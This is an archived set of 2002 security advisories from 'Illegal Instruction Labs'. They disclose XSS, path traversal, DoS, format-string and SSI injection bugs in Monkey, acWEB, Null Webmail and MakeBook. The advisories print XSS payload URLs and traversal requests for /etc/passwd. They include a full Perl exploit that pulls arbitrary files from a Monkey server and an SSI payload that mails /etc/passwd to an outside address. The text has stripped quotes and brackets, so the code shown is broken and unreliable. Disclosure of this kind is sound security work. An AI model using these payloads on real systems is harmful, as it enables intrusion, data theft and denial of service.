XSS bug in Monkey (0.5.0) HTTP server

2002-09-30 Thread DownBload 



   [ Illegal Instruction Labs Advisory ]
[-]
Advisory name: XSS bug in Monkey (0.5.0) HTTP server
Advisory number: 14
Application: Monkey (0.5.0) HTTP server
Application author: Eduardo Silva 
(EdsipeR) 
Author e-mail: [EMAIL PROTECTED]
Monkey Project: http://monkeyd.sourceforge.net
Date: 29.09.2002
Impact: XSS code execution
Tested on: Debian 2.1 (2.0.36 kernel)
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview 
Monkey is very simple and fast HTTP server (daemon). 




==[ Problems
1.) Monkey is vulnerable to XSS.
---cut here---
www.victim.com/lt;scriptgt;alert('IIL_0wnZ_YoU!!!');lt;/scriptgt;
---cut here---

2.) There is also XSS bug in test2.pl CGI script (example script) which 
come with Monkey 0.5.0.
---cut here---
www.victim.com/cgi-bin/test2.pl?lt;scriptgt;alert('IIL_0wnZ_YoU!!!');lt;/scriptgt;
---cut here---




==[ Greetz 
Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org 
(NetZero  Paradox).
I'm very sorry if I forgot someone.

IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server

2002-09-25 Thread DownBload 




[ Illegal Instruction Labs Advisory ]
[-]
Advisory name: Reverse traversal vulnerability in Monkey (0.1.4) HTTP 
server
Advisory number: 12
Application: Monkey (0.1.4) HTTP server
Application author: Eduardo Silva 
(EdsipeR) 
Author e-mail: [EMAIL PROTECTED]
Monkey Project: http://monkeyd.sourceforge.net
Date: 06.09.2002
Impact: Attacker can read files out of SERVER_ROOT directory
Tested on: Debian 2.1 (2.0.36 kernel)
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview 
Monkey is very simple and fast HTTP server (daemon). 
Monkey supports HEAD  GET methods, multiple connections, 100 MIME types.




==[ Problem 
Monkey doesn't check HTTP request for ../ string, and because of that, 
attacker can view any file out of SERVER_ROOT directory which Monkey can 
read (if Monkey is running under root account, attacker can read any file 
on that machine). 
There is still one thing which will make attack a little more complicate:

- src/method.c
...
if((strcmp(aux_request,/))==0 || aux_request[1]=='.' ) {
snprintf(filename,255,%s,SERVER_ROOT);
}
...

Translated to (poor:) english: 
If our request is / or second char of our request is . , than path will be
set to SERVER_ROOT, and in that case, we can't go out of SERVER_ROOT 
directory. 

Previous if will prevent simple reverse traversal attack like this one:
---cut here---
GET /../../../../../../../../../etc/passwd HTTP/1.0
---cut here---

But can't prevent this reverse traversal attack:
---cut here---
GET //../../../../../../../../../etc/passwd HTTP/1.0
---cut here---




==[ Exploit

---cut here---
#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit 
#
# Usage: 
#perl monkey.pl hostname httpport file
#
#hostname - target host 
#httpport - port on which HTTP daemon is listening
#file - file which you wanna get
#
# Example:
#perl monkey.pl www.ii-labs.org 80 /etc/passwd
#   
# by DownBload [EMAIL PROTECTED]
# Illegal Instruction Labs 
#
use IO::Socket;

 sub sock () {
   $SOCK = IO::Socket::INET-new (PeerAddr = $host, 
  PeerPort = $port,
  Proto= tcp) 
   || die [ ERROR: Can't connect to $host!!! ]\n\n;
 }

 sub banner() {
  print [--]\n;
  print [   Monkey-0.1.4 reverse traversal exploit ]\n;
  print [by DownBload downbload\@hotmail.com  ]\n;
  print [ Illegal Instruction Labs ]\n;
  print [--]\n;
 }

 if ($#ARGV != 2)
 {
  banner();
  print [ Usage:   ]\n;
  print [perl monkey.pl hostname httpport file   ]\n;
  print [--]\n;
  exit(0);
 } 

 $host = $ARGV[0];
 $port = $ARGV[1];
 $file = $ARGV[2];

 banner();
 print [ Connecting to $host... ]\n;
 sock();
 print [ Sending probe... ]\n;
 print $SOCK HEAD / HTTP/1.0\n\n;
 while ($a = $SOCK) { $line = $line . $a; } 
 if ($line =~ /Monkey/) { print [ Monkey HTTP server found, 
continuing... ]\n; }
 else { die [ SORRY: That's not Monkey HTTP server :( ]\n\n; }
 close ($SOCK);

 print [ Connecting to $host... ]\n;
 sock();
 print [ Sending GET request... ]\n;
 print $SOCK GET //../../../../../../../../../$file HTTP/1.0\n\n;
 print [ Waiting for response... ]\n\n;
 while ($line = $SOCK) { print $line; }
 close ($SOCK);
---cut here---




==[ Greetz 
Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org 
(NetZero  Paradox). I'm very sorry if I forgot someone.

IIL Advisory: Format String bug in Null Webmail (0.6.3)

2002-09-25 Thread DownBload 




 [ Illegal Instruction Labs Advisory ]
[-]
Advisory name: Format String bug in Null Webmail (0.6.3)
Advisory number: 7
Application: Null Webmail 0.6.3
Author: Dan Cahill
E-mail: [EMAIL PROTECTED]
Homepage: http://http://www.nulllogic.com/webmail/
Date: 1.07.2002
Impact: I don't know (yet)
Tested on: nowhere
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview

Null Webmail is CGI interface to SMTP  POP3 server (you can read and 
send mail with your browser). It is written in C. You can find Null 
Webmail on sourceforge.




==[ Problem 

Null Webmail has format string bug in logdata() and wmprintf(), but
logdata() is inside /* */, so logdata() isn't interesting to us. 

Here comes the buggy code:

---[ wmserver.c
...
/*
void logdata(const char *format, ...)  /* --- NOT INTERESTING */
{
char logbuffer[1024];
char file[200];
va_list ap;
FILE *fp;

#ifdef WIN32
snprintf(file, sizeof(file)-1, C:\\webmail.log);
#else
snprintf(file, sizeof(file)-1, /tmp/webmail.log);
#endif
fp=fopen(file, a);
if (fp!=NULL) {
va_start(ap, format);
vsnprintf(logbuffer, sizeof(logbuffer)-1, format, ap);
va_end(ap);
fprintf(fp, %s, logbuffer);
fclose(fp);
}
}
*/


int wmprintf(const char *format, ...)/* --- INTERESTING FUNCTION */
{
char buffer[1024];
va_list ap;

va_start(ap, format);
vsnprintf(buffer, sizeof(buffer)-1, format, ap); // - INTERESTING 
va_end(ap); 
send(wmsocket, buffer, strlen(buffer), 0);
//  logdata ( %s, buffer);
return 0;
}
...

---[ call wmprinf() 

...
wmprintf(USER %s\r\n, wmusername);
...
wmprintf(PASS %s\r\n, wmpassword);
...
wmprintf(MAIL From: %s\r\n, ptemp);  
...
wmprintf(RCPT To: %s\r\n, msgaddr);
...
wmprintf(From: %s\r\n, wmaddress);
wmprintf(To: %s\r\n, msgto);
...
wmprintf(Subject: %s\r\n, msgsubject);
...
etc.

Here we have few wmprintf() calls, and I think that we can put our 
'NASTY %sTRING' in all that variables :).




==[ Example

Can't test this bug!!!
If I'm wrong about this format string bug in Null Webmail, I'm very sorry.




==[ Greetz 

Greetz goes to #hr.hackers  #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, Fr1c,
phreax, harlequin, LekaMan, Astral and www.active-security.org (NetZero  
Paradox).

IIL Advisory: Vulnerabilities in acWEB HTTP server

2002-09-25 Thread DownBload 




[ Illegal Instruction Labs Advisory ]
[-]
Advisory name: Vulnerabilities in acWEB HTTP server
Advisory number: 13
Application: acWEB HTTP server
Author e-mail: [EMAIL PROTECTED]
Homepage: somewhere on sourceforge
Date: 10.09.2002
Impact: DoS, XSS, etc.
Tested on: Windows 98
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview 

Sourceforge: acWEB is an OpenSource replacement for MS IIS and other 
proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by 
viruses like CodeRed, Nimda, etc :).

/ME says: acWEB is simple HTTP server for Windows. It is perfect for tiny 
companies, and for home use.




==[ Problem(s)  

===[ Remote DoS
First vulnerability which I discovered in acWEB HTTP server was remote DoS.
It is possible to crush acWEB (and Windows too) with simple HTTP request:
---cut here---
http://www.victim.com/com2.bat 
---cut here---


===[ XSS a.k.a CSS bug
XSS code execution:
---cut here---
http://www.victim.com/%dblt;scriptgt;alert('Illegal%20Instruction%20Labs%
200wnz%20YoU!!!');lt;/scriptgt;/
---cut here---


===[ Fake file download
---cut here---
http://www.victim.com/|%5chacked.txt%00
---cut here---

When this request it sent to acWEB HTTP server, acWEB will return:
---
HTTP/1.0 200 OK
Content-Length: 0
Connection: Close
Content-Type: application/octet-stream
Server: Eserv/3.x

---
That is fuqn weird, because file 'hacked.txt' don't exist. acWEB HTTP 
server will
send us 'hacked.txt' empty file to download. 




==[ Exploit

This can be exploited with browser, so I won't write exploit for this...or 
maybe one day :).




==[ Greetz 

Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org 
(NetZero  Paradox). I'm very sorry if I forgot someone.

SSI CSS execution in MakeBook 2.2

2002-06-12 Thread DownBload 



  [ DownBload Security Research Lab Advisory ]
[-]
Advisory name: SSI  CSS execution in MakeBook 2.2
Advisory number: 5  
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002 
Impact: remote user can execute shell commands  cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




--[ Overview 

...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages.  It allows a user to enter their name, email address,
and some text which will then be added to the bookfile.  Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the book entries should appear, and even what pages they appear 
on...


   

--[ Problem 

Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse. 
It works fine, but troubles comes when you look for security measures in 
program. When you want to sign guestbook, you have to write your name,
email address, and some text. Script does remove 'some' special-char in 
$text, but script doesn't replace special-chars in $name at all, and 
because
of that, it is possible instead of name, enter and execute some SSI(Server
Side Includes) or CSS(Cross Site Scripting) code.
'Buggy' code:
...
$name =$data{Name};
$email =$data{Email};
$text =$data{Text};
$text =~ s//lt;/g;
$text =~ s//gt;/g;
...




--[ Examples

SSI attack
~~
Name: !--#exec cmd=/bin/mail [EMAIL PROTECTED]  /etc/passwd--
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~
Name: img src=javascript:alert('HACKED BY DOWNBLOAD');
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: SSI attack depends on web server, because some web servers
comes with, and some without support for SSI.




--[ Solution 

Solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name  = $data{Name};
$name  =~ s//lt;/g;
$name  =~ s//gt;/g;

$email = $data{Email};
$email =~ s//lt;/g;
$email =~ s//gt;/g;

$text = $data{Text};
$text =~ s//lt;/g;
$text =~ s//gt;/g;
...




--[ Greetz

Greetz goes to #hr.hackers irc.carnet.hr.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.